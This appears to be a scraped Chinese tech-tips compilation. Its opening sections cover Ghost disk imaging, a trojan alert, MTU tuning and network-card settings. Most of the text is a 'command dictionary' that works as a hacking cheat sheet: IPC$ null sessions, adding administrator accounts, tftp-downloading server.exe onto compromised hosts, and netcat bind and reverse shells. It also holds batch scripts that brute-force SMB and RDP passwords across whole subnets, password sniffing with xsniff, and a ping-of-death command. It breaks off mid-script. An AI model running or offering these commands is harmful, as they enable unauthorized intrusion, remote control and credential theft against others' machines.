这时屏幕会提示三个选择项，分别是NO，FAST和HIGH。这三种的意思是：NO：备份时不进行压缩处理，所以速度最快，FAST：备份中进行一定的压缩处理，速度比较快。HIGH：备份时压缩，压缩后体积小，但进行速度较慢。这三个选择项可以根据你的爱好来选择。最后确认即可，GHOST就开始了备份的工作。 6、从镜像恢复分区： 运行GHOST，选择LOCAL PARTITION FROM IMAGE，选定你备份文件的存放位置（GHOST的扩展名为GHO）。然后选定你要恢复的分区（这往往是你硬盘的第一个分区！）确定后，GHOST就开始恢复工作了，几分钟后系统就恢复了。因为GHOST备份时使用的是原有系统，所以建议你备份之前一定要保证系统的完整性、所使用的软件全都完整，清理好回收站，安装好各个设备的驱动程序，再进行备份。另外在恢复备份之前也别忘了备份你近一段时间的重要数据，因为GHOST的镜像中可不包括这些。 7、检查功能： GHOST还具有检查功能，以检查你的镜像文件及磁盘的工作状态是否良好，这些功能应用的场合不太多，所以老安也就不多介绍了。 8、LPT传输功能： GHOST还可以支持LPT并口的数据传输功能，可以通过并口线方便的连接笔记本电脑和台式机，进行数据的交换！

磁碟机病毒(Dummycom)简介

近日，360安全中心截获了一款新的木马病毒，命名为“磁碟机Dummycom”，该木马病毒通过U盘、ARP攻击及网页漏洞等多种方式传播，并会在计算机中的文件反复感染。属于需进行紧急处理的恶性木马病毒，360安全中心独家发布专杀工具.

该程序运行后关闭并阻止360安全卫士和卡巴、瑞星、金山、江民等大家所熟知的安全类软件的运行，除此之外还会删除系统中含有“360”字样的文件。感染病毒后，进程中会出现2个smss.exe和2个lsass.exe进程（如果只一个smss.exe和lsass.exe进程，说明系统正常，并不是磁碟机，请不要惊慌），使用任务管理器结束后会造成计算机重启。

据分析，该病毒使用的关闭安全软件的方法和以往不同，其通过发生一堆垃圾消息，导致安全程序的崩溃，连icesword（冰刃）也未能幸免。其在运行后，会在 system32的Com 目录下生成smss.exe,lsass.exe, netcfg.dll等文件并在system32下生成dsnq.dll文件，在关机瞬间会写一个文件到开始菜单的启动项中；病毒文件名一般为“~.exe”。需要注意的是，该病毒使用极其恶毒的感染方式，导致文件被感染后无法使用且部分文件无法恢复。

360安全专家提醒用户，此类恶性木马病毒需及时使用专杀工具进行查杀。并升级360安全卫士到最新版本，及时修补系统漏洞，进行定期扫描。以避免损失。

MTU是Maximum Transmission Unit的缩写。意思是网络上传送的最大数据包。MTU的单位是字节。 大部分网络设备的MTU都是1500。如果本机的MTU比网关的MTU大，大的数据包就会被拆开来传送，这样会产生很多数据包碎片，增加丢包率，降低网络速度。把本机的MTU设成比网关的MTU小或相同，就可以减少丢包。 3、如何检测网关的MTU？ 在本机打开dos窗口，执行： ping -f -l 1472 192.168.0.1 其中192.168.0.1是网关IP地址，1472是数据包的长度。请注意，上面的参数是“-l”（小写的L），而不是“-1”。 如果能ping通，表示数据包不需要拆包，可以通过网关发送出去。 如果出现： Packet needs to be fragmented but DF set. 表示数据包需要拆开来发送。此时，减少数据包长度，再执行上面的ping命令。从1400到1472之间多试几次，就能找到合适的数据包长度了。把数据包长度加上数据包头28字节，就得到MTU的值。 如果检测到网关的MTU值是1500，不需要修改。 如果网关有防火墙ping不通，可以试试直接把MTU设为1400。 4、如何修改本机的MTU？ 修改方法如下： （1）、运行regedit （2）、浏览到： HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces 如图2 （3）、Interfaces下有多个子项，每个子项对应一个网卡。请按如下方法选择网卡： （a）确定本机用来连接Internet的网卡或拨号连接的IP，如192.168.0.19； （b）用鼠标点击Interfaces上的子项，查看键值列表中的IPAddress项； （c）如果IPAddress的键值与（a）中的IP相同，即192.168.0.19，则该子项就是要找的网卡。 （4）、进入该子项，在右边的窗口里按鼠标右键，选择“新建”->“双字节值”，输入名称“MTU”，按回车。再用鼠标双击“MTU”，弹出修改窗口： 如图3： 填入MTU的值。填写前请先把基数设为十进制。 设置好后，需要重启机器才能生效。

NVIDIA nForce Networking Controller网卡延时

网盟一贴！ NVIDIA nForce Networking Controller网卡最佳设置...剑侠2..延迟0. 卡位.人物看不到头、看不到人...玩着玩着 自动弹出.. ======================================= Checksum Offload 设置为 Disable Flow Control 设置为 Disable 延迟问题解决...玩游戏会不定时弹出.. ======================================== ASF Event0 - Boot Failure Enable ASF Event1 - Fan Problem Enable ASF Event10 - Case Intrusio Enable ASF Event4 - Heartbeat Enable ASF Event6-power button Enable ASF Event7-System Hot Enable ASF Event8-CPU Overheate Enable ASF Heartbeat interval (sec) 600 ASF Managing Station IP add ASF PET Packet Send Count 1 ASF Support Disable Checksum Offload Disable Flow Control Disable IEEE802.1P Support Disable Jumbo Frame Payload Size 1500 Low Power State Link Speed Enable Network Address Optimize For Segmentation Offload Enable Speed/duplex settings VLAN Id VLAN Support Wake on Magic packet Wake on pattern WakeOnLAN From PowerOff

NF网卡在千兆网络中的设置问题

NF网卡在千兆网络中的设置问题 这两天研究了一下NF4/NF5的网卡默认设置，发现存在一些问题，需要手动更改才能达到比较好的速度，下面我用Foxconn N5M2AA为例说一下 Checksum Offload   数据包校验 建议关闭 Flow Control     流量控制 一定要关闭 IEEE802.1P Support   IEEE802.1P支持 建议关闭 Jumbo Frame Payload Size   默认是1500   这个是千兆网络一个新的设置，在下文详细叙述。 Low Power State Link Speed   网卡节能   建议关闭 Network Address     MAC的修改   默认为不存在 一般不必改动 Optimize For   CPU/Throughput   为CPU占用优化或为吞吐量进行优化，设置为CPU的话，网卡的速度被限制，但CPU占用会很低，假如改为Throughput的话，网卡的性能才能完全发挥，但CPU的占用也会上升不少。 Segmentation Offload   建议关闭 Speed/Duplex Settings   Full Autonegotiation（全自适应，一般不用修改） VLAN Id   默认是1 不用改 VLAN Support   VLAN支持 一般关闭 Wake on Magic packet   魔术数据包唤醒 建议关闭 Wake on pattern   建议关闭 WakeOnLAN From PowerOff   建议关闭 下面讲讲关于Jumbo Frame这个选项，这是一个新的技术，传统来说，标准以太网帧就是 1518 字节，除去 14 字节以太网头和 4 字节 CRC 校验是 1500，正好是 MTU 值，这是为以前的网络环境而考虑的设定大小，但在目前的千兆局域网环境中，各种设备已经十分稳定，所以一些厂家为了提高性能，提出Jumbo Frame这个新技术，但因为这个技术并非网络标准所规定的通讯设定，所以各厂家的产品都有差异，未必能够兼容。 用法的考虑因素 [*]只有在整个网络上的设备都支持“巨帧”且配置为使用相同的帧大小时，才启用“巨帧”。在其他网络设备上设置“巨帧”时，应明白不同的网络设备对“巨帧”大小的计算也不相同。有些设备将数据包头的信息包括在帧大小中，有些不包括。英特尔适配器不将数据包头的信息包括在帧大小中。 [*]巨帧仅支持 TCP/IP。 [*]以 10 或 100 Mbps 使用巨帧将导致性能变差或链接丢失。 [*]在交换器上配置巨帧时，对 CRC 将帧大小最多设置 4 个字节，如果使用 VLAN 或 Qos 数据包标记，则再加 4 个字节。 简单来说，当你确定你的交换机支持Jumbo Frame的时候，且服务器和客户机都是NF的网卡，你可以试一下都调节成为9000这个数，看看效果有没有提升。理论上讲，是可以极大的提高Station和存储的IO性能。

千个常用DOS命令全面收藏

DOS命令字典..收藏
net use \\ip\ipc$ " " /user:" " 建立IPC空链接
net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接
net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C：到本地为

H:
net use h: \\ip\c$ 登陆后映射对方C：到本地为H:
net use \\ip\ipc$ /del 删除IPC链接
net use h: /del 删除映射对方到本地的为H:的映射
net user 用户名　密码　/add 建立用户
net user guest /active:yes 激活guest用户
net user 查看有哪些用户
net user 帐户名 查看帐户的属性
net localgroup ***istrators 用户名 /add 把“用户”添加到管理员中使其具

有管理员权限,注意：***istrator后加s用复数
net start 查看开启了哪些服务
net start 服务名　 开启服务；(如:net start telnet， net start schedule)
net stop 服务名 停止某服务
net time \\目标ip 查看对方时间
net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加

上参数/yes可取消确认信息
net view 查看本地局域网内开启了哪些共享
net view \\ip 查看对方局域网内开启了哪些共享
net config 显示系统网络设置
net logoff 断开连接的共享
net pause 服务名 暂停某服务
net send ip "文本信息" 向对方发信息
net ver 局域网内正在使用的网络连接类型和信息
net share 查看本地开启的共享
net share ipc$ 开启ipc$共享
net share ipc$ /del 删除ipc$共享
net share c$ /del 删除C：共享
net user guest 12345 用guest用户登陆后用将密码改为12345
net password 密码 更改系统登陆密码
netstat -a 查看开启了哪些端口,常用netstat -an
netstat -n 查看端口的网络连接情况，常用netstat -an
netstat -v 查看正在进行的工作
netstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip

协议使用情况）
netstat -s 查看正在使用的所有协议使用情况
nbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的

用户名（03前的为用户名）-注意：参数-A要大写
tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设

置超时间隔。
ping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]

数据包大小”；“-n发送数据次数”；“-t”指一直ping。
ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之

ping)
ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，

ipconfig可用参数“/all”显示全部配置信息
tlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装

目录的Support/tools文件夹内)
kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具，默认是没有安

装的，在安装目录的Support/tools文件夹内)
del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除

只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏

、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文

件，“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件

#2 二：

del /S /Q 目录 或用：rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和

文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。（二个命令作

用相同）
move 盘符\路径\要移动的文件名　存放移动文件的路径\移动后文件名 移动文件

,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖
fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件

中，"> "和"> >" 是重定向命令
at id号 开启已注册的某个计划任务
at /delete 停止所有计划任务，用参数/yes则不需要确认就直接停止
at id号 /delete 停止某个已注册的计划任务
at 查看所有的计划任务
at \\ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算

机
finger username @host 查看最近有哪些用户登陆
telnet ip 端口 远和登陆服务器,默认端口为23
open ip 连接到IP（属telnet登陆后的命令）
telnet 在本机上直接键入telnet 将进入本机的telnet
copy 路径\文件名1　路径\文件名2 /y 复制文件1到指定的目录为文件2，用参数

/y就同时取消确认你要改写一份现存目录文件
copy c:\srv.exe \\ip\***$ 复制本地c:\srv.exe到对方的***下
cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成

3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指

ASCLL格式文件
copy \\ip\***$\svv.exe c:\ 或:copy\\ip\***$\*.* 复制对方***i$共享下的

srv.exe文件（所有文件）至本地C：
xcopy 要复制的文件或目录树　目标地址\目录名 复制文件和目录树，用参数/Y

将不提示覆盖相同文件
tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe

登陆后，将“IP”的server.exe下载到目标主机c:\server.exe 参数：-i指以二

进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模

式）进行传送
tftp -i 对方IP　put c:\server.exe 登陆后，上传本地c:\server.exe至主机
ftp ip 端口 用于上传文件至服务器或进行文件操作，默认端口为21。bin指用二

进制方式传送（可执行文件进）；默认为ASCII格式传送(文本文件时)
route print 显示出IP路由，将主要显示网络地址Network addres，子网掩码

Netmask，网关地址Gateway addres，接口地址Interface
arp 查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理

性的MAC地址。arp -a将显示出全部信息
start 程序名或命令 /max 或/min 新开一个新窗口并最大化（最小化）运行某程

序或命令
mem 查看cpu使用情况
attrib 文件名(目录名) 查看某文件（目录）的属性
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档，只读

，系统，隐藏 属性；用＋则是添加为某属性
dir 查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时

间，/T:A显示文件上次被访问时间，/T:W上次被修改时间
date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和

时间，而不必输入新日期和时间
set 指定环境变量名称=要指派给变量的字符 设置环境变量
set 显示当前所有的环境变量
set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量
pause 暂停批处理程序，并显示出：请按任意键继续....
if 在批处理程序中执行条件处理（更多说明见if命令及变量）
goto 标签 将cmd.exe导向到批处理程序中带标签的行（标签必须单独一行，且以

冒号打头，例如：“：start”标签）
call 路径\批处理文件名 从批处理程序中调用另一个批处理程序 （更多说明见

call /?）
for 对一组文件中的每一个文件执行某个特定命令（更多说明见for命令及变量）
echo on或off 打开或关闭echo，仅用echo不加参数则显示当前echo设置
echo 信息 在屏幕上显示出信息
echo 信息 >> pass.txt 将"信息"保存到pass.txt文件中
findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello
find 文件名 查找某文件
title 标题名字 更改CMD窗口标题名字
color 颜色值 设置cmd控制台前景和背景颜色；0＝黑、1＝蓝、2＝绿、3＝浅绿

、4＝红、5＝紫、6＝黄、7=白、8=灰、9=淡蓝、A＝淡绿、B=淡浅绿、C=淡红、

D=淡紫、E=淡黄、F=亮白
prompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为：EntSky\ )

#3 三：

ver 在DOS窗口下显示版本信息
winver 弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、计算机名

）
format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例：Format D:

/FS:NTFS
md　目录名 创建目录
replace 源文件　要替换文件的目录 替换文件
ren 原文件名　新文件名 重命名文件名
tree 以树形结构显示出目录，用参数-f 将列出第个文件夹中文件名称
type 文件名 显示文本文件的内容
more 文件名 逐屏显示输出文件
doskey 要锁定的命令＝字符
doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行，重新调用win2k命令，

并创建宏)。如：锁定dir命令：doskey dir=entsky (不能用doskey dir=dir)；

解锁：doskey dir=
taskmgr 调出任务管理器
chkdsk /F D: 检查磁盘D并显示状态报告；加参数/f并修复磁盘上的错误
tlntadmn telnt服务admn,键入tlntadmn选择3，再选择8,就可以更改telnet服务

默认端口23为其它任何端口
exit 退出cmd.exe程序或目前，用参数/B则是退出当前批处理脚本而不是cmd.exe
path 路径\可执行文件的文件名 为可执行文件设置一个路径。
cmd 启动一个win2K命令解释窗口。参数：/eff、/en 关闭、开启命令扩展；更我

详细说明见cmd /?
regedit /s 注册表文件名 导入注册表；参数/S指安静模式导入，无任何提示；
regedit /e 注册表文件名 导出注册表
cacls 文件名　参数 显示或修改文件访问控制列表（ACL）——针对NTFS格式时

。参数：/D 用户名:设定拒绝某用户访问；/P 用户名:perm 替换指定用户的访问

权限；/G 用户名:perm 赋予指定用户访问权限；Perm 可以是: N 无，R 读取，

W 写入， C 更改(写入)，F 完全控制；例：cacls D:\test.txt /D pub 设定

d:\test.txt拒绝pub用户访问。
cacls 文件名 查看文件的访问用户权限列表
REM 文本内容 在批处理文件中添加注解
netsh 查看或更改本地网络配置情况

#4 四：

IIS服务命令：
iisreset /reboot 重启win2k计算机（但有提示系统将重启信息出现）
iisreset /start或stop 启动（停止）所有Internet服务
iisreset /restart 停止然后重新启动所有Internet服务
iisreset /status 显示所有Internet服务状态
iisreset /enable或disable 在本地系统上启用（禁用）Internet服务的重新启

动
iisreset /rebootonerror 当启动、停止或重新启动Internet服务时，若发生错

误将重新开机
iisreset /noforce 若无法停止Internet服务，将不会强制终止Internet服务
iisreset /timeout Val在到达逾时间（秒）时，仍未停止Internet服务，若指定

/rebootonerror参数，则电脑将会重新开机。预设值为重新启动20秒，停止60秒

，重新开机0秒。
FTP 命令： (后面有详细说明内容)
ftp的命令行格式为:
ftp －v －d －i －n －g[主机名] －v 显示远程服务器的所有响应信息。
－d 使用调试方式。
－n 限制ftp的自动登录,即不使用.netrc文件。
－g 取消全局文件名。
help [命令] 或 ？[命令] 查看命令说明
bye 或 quit 终止主机FTP进程,并退出FTP管理方式.
pwd 列出当前远端主机目录
put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端

主机中
get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至

本地主机中
mget [remote-files] 从远端主机接收一批文件至本地主机
mput local-files 将本地主机中一批文件传送至远端主机
dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.

如果有本地文件,就将结果写至本地文件
ascii 设定以ASCII方式传送文件(缺省值)
bin 或 image 设定以二进制方式传送文件
bell 每完成一次文件传送,报警提示
cdup 返回上一级目录
close 中断与远程服务器的ftp会话(与open对应)
open host[port] 建立指定ftp服务器连接,可指定连接端口
delete 删除远端主机中的文件
mdelete [remote-files] 删除一批文件
mkdir directory-name 在远端主机中建立目录
rename [from] [to] 改变远端主机中的文件名
rmdir directory-name 删除远端主机中的目录
status 显示当前FTP的状态
system 显示远端主机系统类型
user user-name [password] [account] 重新以别的用户名登录远端主机
open host [port] 重新建立一个新的连接
prompt 交互提示模式
macdef 定义宏命令
lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录
chmod 改变远端主机的文件权限
case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母
cd remote－dir 进入远程主机目录
cdup 进入远程主机目录的父目录
! 在本地机中执行交互shell，exit回到ftp环境,如!ls＊.zip

#5 五：

MYSQL 命令：
mysql -h主机地址 -u用户名 －p密码 连接MYSQL;如果刚安装好MYSQL，超级用户

root是没有密码的。
（例：mysql -h110.110.110.110 -Uroot -P123456
注:u与root可以不用加空格，其它也一样）
exit 退出MYSQL
mysql*** -u用户名 -p旧密码 password 新密码 修改密码
grant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增

加新用户。（注意：和上面不同，下面的因为是MYSQL环境中的命令，所以后面都

带一个分号作为命令结束符）
show databases; 显示数据库列表。刚开始时才两个数据库：mysql和test。

mysql库很重要它里面有MYSQL的系统信息，我们改密码和新增用户，实际上就是

用这个库进行操作。
use mysql；
show tables; 显示库中的数据表
describe 表名; 显示数据表的结构
create database 库名; 建库
use 库名；
create table 表名 (字段设定列表)； 建表
drop database 库名;
drop table 表名； 删库和删表
delete from 表名; 将表中记录清空
select * from 表名; 显示表中的记录
mysqldump --opt school>school.bbb 备份数据库：（命令在DOS的\\mysql\\bin

目录下执行）;注释:将数据库school备份到school.bbb文件，school.bbb是一个

文本文件，文件名任取，打开看看你会有新发现。
win2003系统下新增命令（实用部份）：
shutdown /参数 关闭或重启本地或远程主机。
参数说明：/S 关闭主机，/R 重启主机， /T 数字 设定延时的时间，范围0～180

秒之间， /A取消开机，/M //IP 指定的远程主机。
例：shutdown /r /t 0 立即重启本地主机（无延时）
taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。
参数说明：/PID 要终止进程的pid,可用tasklist命令获得各进程的pid，/IM 要

终止的进程的进程名，/F 强制终止进程，/T 终止指定的进程及他所启动的子进

程。
tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标

识符(PID)。
参数说明：/M 列出当前进程加载的dll文件，/SVC 显示出每个进程对应的服务，

无参数时就只列出当前的进程。

#6 六：

Linux系统下基本命令： 要区分大小写
uname 显示版本信息（同win2K的 ver）
dir 显示当前目录文件,ls -al 显示包括隐藏文件（同win2K的 dir）
pwd 查询当前所在的目录位置
cd cd　..回到上一层目录，注意cd 与..之间有空格。cd　/返回到根目录。
cat 文件名 查看文件内容
cat >abc.txt 往abc.txt文件中写上内容。
more 文件名 以一页一页的方式显示一个文本文件。
cp 复制文件
mv 移动文件
rm 文件名 删除文件，rm -a 目录名删除目录及子目录
mkdir 目录名 建立目录
rmdir 删除子目录，目录内没有文档。
chmod 设定档案或目录的存取权限
grep 在档案中查找字符串
diff 档案文件比较
find 档案搜寻
date 现在的日期、时间
who 查询目前和你使用同一台机器的人以及Login时间地点
w 查询目前上机者的详细资料
whoami 查看自己的帐号名称
groups 查看某人的Group
passwd 更改密码
history 查看自己下过的命令
ps 显示进程状态
kill 停止某进程
gcc 黑客通常用它来编译C语言写的文件
su 权限转换为指定使用者
telnet IP telnet连接对方主机（同win2K），当出现bash$时就说明连接成功。
ftp ftp连接上某服务器（同win2K）

附：批处理命令与变量

1：for命令及变量 基本格式：
FOR /参数 %variable IN (set) DO command [command_parameters] %variable:

指定一个单一字母可替换的参数，如：%i ，而指定一个变量则用：%%i ，而调用

变量时用：%i% ，变量是区分大小写的（%i 不等于 %I）。
批处理每次能处理的变量从%0—%9共10个，其中%0默认给批处理文件名使用，%1

默认为使用此批处理时输入的的第一个值，同理：%2—%9指输入的第2-9个值；例

：net use \\ip\ipc$ pass /user:user 中ip为%1,pass为%2 ,user为%3

(set):指定一个或一组文件，可使用通配符，如：(D:\user.txt)和(1 1 254)(1

-1 254),{ “(1 1 254)”第一个"1"指起始值，第二个"1"指增长量，第三

个"254"指结束值，即：从1到254；“(1 -1 254)”说明：即从254到1 }

command：指定对第个文件执行的命令，如：net use命令；如要执行多个命令时

，命令这间加：& 来隔开
command_parameters：为特定命令指定参数或命令行开关

IN (set)：指在(set)中取值；DO command ：指执行command

参数：/L 指用增量形式{ (set)为增量形式时 }；/F 指从文件中不断取值，直到

取完为止{ (set)为文件时，如(d:\pass.txt)时 }。
用法举例：
@echo off
echo 用法格式：test.bat *.*.* > test.txt

for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \\%1.%%G

/user:***istrator | find "命令成功完成" >>test.txt
存为test.bat 说明：对指定的一个C类网段的254个IP依次试建立***istrator密

码为空的IPC$连接，如果成功就把该IP存在test.txt中。

/L指用增量形式（即从1-254或254-1）；输入的IP前面三位：*.*.*为批处理默认

的 %1；%%G 为变量(ip的最后一位）；& 用来隔开echo 和net use 这二个命令；

| 指建立了ipc$后，在结果中用find查看是否有"命令成功完成"信息；%1.%%G 为

完整的IP地址；(1 1 254) 指起始值，增长量，结止值。
@echo off
echo 用法格式：ok.bat ip
FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200
存为：ok.exe 说明：输入一个IP后，用字典文件d:\pass.dic来暴解d:\user.dic

中的用户密码，直到文件中值取完为止。%%i为用户名；%1为输入的IP地址（默认

）。http://www.jz5u.com

#7 七：

2：if命令及变量 基本格式：
IF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指

定数字的退出编码，指定条件为“真”。
例：IF errorlevel 0 命令 指程序执行后返回的值为0时，就值行后面的命令；

IF not errorlevel 1 命令指程序执行最后返回的值不等于1，就执行后面的命令

。
0 指发现并成功执行（真）；1 指没有发现、没执行（假）。
IF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配（即：字符串

1 等于 字符串2），就执行后面的命令。
例：“if "%2%"=="4" goto start”指：如果输入的第二个变量为4时，执行后面

的命令（注意：调用变量时就%变量名%并加" "）
IF [not] exist 文件名 命令语句 如果指定的文件名存在，就执行后面的命令。
例：“if not nc.exe goto end”指：如果没有发现nc.exe文件就跳到":end"标

签处。
IF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字

符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令

语句 加上：else 命令语句后指：当前面的条件不成立时，就指行else后面的命

令。注意：else 必须与 if 在同一行才有效。 当有del命令时需把del命令全部

内容用< >括起来，因为del命令要单独一行时才能执行，用上< >后就等于是单独

一行了；例如：“if exist test.txt. <del test.txt.> else echo

test.txt.missing ”，注意命令中的“.”

系统外部命令(均需下载相关工具)： 1、瑞士军刀：nc.exe 参数说明： -h 查看帮助信息 -d 后台模式 -e prog程序重定向，一但连接就执行［危险］ -i secs延时的间隔 -l 监听模式，用于入站连接 -L 监听模式，连接天闭后仍然继续监听，直到CTR+C -n IP地址，不能用域名 -o film记录16进制的传输 -p[空格]端口 本地端口号 -r 随机本地及远程端口 -t 使用Telnet交互方式 -u UDP模式 -v 详细输出，用-vv将更详细 -w数字 timeout延时间隔 -z 将输入，输出关掉（用于扫锚时） 基本用法： nc -nvv 192.168.0.1 80 连接到192.168.0.1主机的80端口 nc -l -p 80 开启本机的TCP 80端口并监听 nc -nvv -w2 -z 192.168.0.1 80-1024 扫锚192.168.0.1的80-1024端口 nc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定remote主机的cmdshell在 remote的TCP 5354端口 nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主机的 cmdshell并反向连接192.168.0.2的5354端口 高级用法： nc -L -p 80 作为蜜罐用1：开启并不停地监听80端口，直到CTR+C为止 nc -L -p 80 > c:\log.txt 作为蜜罐用2：开启并不停地监听80端口，直到 CTR+C,同时把结果输出到c:\log.txt nc -L -p 80 < c:\honeyport.txt 作为蜜罐用3-1：开启并不停地监听80端口， 直到CTR+C,并把c:\honeyport.txt中内容送入管道中，亦可起到传送文件作用 type.exe c:\honeyport | nc -L -p 80 作为蜜罐用3-2：开启并不停地监听80端 口，直到CTR+C,并把c:\honeyport.txt中内容送入管道中,亦可起到传送文件作用 本机上用：nc -l -p 本机端口 在对方主机上用：nc -e cmd.exe 本机IP -p 本机端口 *win2K nc -e /bin/sh 本机IP -p 本机端口 *linux,unix 反向连接突破对方主机的防火 墙 本机上用：nc -d -l -p 本机端口 < 要传送的文件路径及名称 在对方主机上用：nc -vv 本机IP 本机端口 > 存放文件的路径及名称 传送文件 到对方主机 备 注： | 管道命令 < 或 > 重定向命令。“<”，例如：tlntadmn < test.txt 指把test.txt的内容 赋值给tlntadmn命令 ＠ 表示执行＠后面的命令，但不会显示出来（后台执行）；例：＠dir c:\winnt >> d:\log.txt 意思是：后台执行dir，并把结果存在d:\log.txt中 >与>>的区别 　">"指：覆盖；">>"指：保存到(添加到）。 如：@dir c:\winnt >> d:\log.txt和@dir c:\winnt > d:\log.txt二个命令分别 执行二次比较看：用>>的则是把二次的结果都保存了，而用：>则只有一次的结果 ，是因为第二次的结果把第一次的覆盖了。 #8 八： 2、扫锚工具：xscan.exe 基本格式 xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项] 扫锚"起始IP到终止 IP"段的所有主机信息 xscan -file <主机列表文件名> <检测项目> [其他选项] 扫锚"主机IP列表文件 名"中的所有主机信息 检测项目 -active 检测主机是否存活 -os 检测远程操作系统类型（通过NETBIOS和SNMP协议） -port 检测常用服务的端口状态 -ftp 检测FTP弱口令 -pub 检测FTP服务匿名用户写权限 -pop3 检测POP3-Server弱口令 -smtp 检测^TP-Server漏洞 -sql 检测SQL-Server弱口令 -smb 检测NT-Server弱口令 -iis 检测IIS编码/解码漏洞 -cgi 检测CGI漏洞 -nasl 加载Nessus攻击脚本 -all 检测以上所有项目 其它选项 -i 适配器编号 设置网络适配器, <适配器编号>可通过"-l"参数获取 -l 显示所有网络适配器 -v 显示详细扫描进度 -p 跳过没有响应的主机 -o 跳过没有检测到开放端口的主机 　 -t 并发线程数量,并发主机数量 指定最大并发线程数量和并发主机数量, 默 认数量为100,10 -log 文件名 指定扫描报告文件名 (后缀为：TXT或HTML格式的文件) 用法示例 xscan -host 192.168.1.1-192.168.255.255 -all -active -p　 检测 192.168.1.1-192.168.255.255网段内主机的所有漏洞，跳过无响应的主机 xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 检测 192.168.1.1-192.168.255.255网段内主机的标准端口状态，NT弱口令用户，最大 并发线程数量为150，跳过没有检测到开放端口的主机 xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 检测“hostlist.txt” 文件中列出的所有主机的标准端口状态，CGI漏洞，最大并发线程数量为200，同 一时刻最多检测5台主机，显示详细检测进度，跳过没有检测到开放端口的主机 www.jz5u.com #9 九： 3、命令行方式嗅探器: xsniff.exe 可捕获局域网内FTP/^TP/POP3/HTTP协议密码 参数说明 -tcp 输出TCP数据报 -udp 输出UDP数据报 -icmp 输出ICMP数据报 -pass 过滤密码信息 -hide 后台运行 -host 解析主机名 -addr IP地址 过滤IP地址 -port 端口 过滤端口 -log 文件名 将输出保存到文件 -asc 以ASCII形式输出 -hex 以16进制形式输出 用法示例 xsniff.exe -pass -hide -log pass.log 后台运行嗅探密码并将密码信息保存在 pass.log文件中 xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1并过滤tcp和 udp信息并以ASCII格式输出 4、终端服务密码破解: tscrack.exe 参数说明 -h 显示使用帮助 -v 显示版本信息 -s 在屏幕上打出解密能力 -b 密码错误时发出的声音 -t 同是发出多个连接（多线程） -N Prevent System Log entries on targeted server -U 卸载移除tscrack组件 -f 使用－f后面的密码 -F 间隔时间（频率） -l 使用－l后面的用户名 -w 使用－w后面的密码字典 -p 使用－p后面的密码 -D 登录主页面 用法示例 tscrack 192.168.0.1 -l ***istrator -w pass.dic 远程用密码字典文件暴破主 机的***istrator的登陆密码 tscrack 192.168.0.1 -l ***istrator -p 123456 用密码123456远程登陆 192.168.0.1的***istrator用户 @if not exist ipcscan.txt goto noscan @for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i nscan @echo 3389.txt no find or scan faild (①存为3389.bat) （假设现有用SuperScan或其它扫锚器扫到一批开有3389的主 机IP列表文件3389.txt) 3389.bat意思是：从3389.txt文件中取一个IP，接着运行hack.bat @if not exist tscrack.exe goto noscan @tscrack %1 -l ***istrator -w 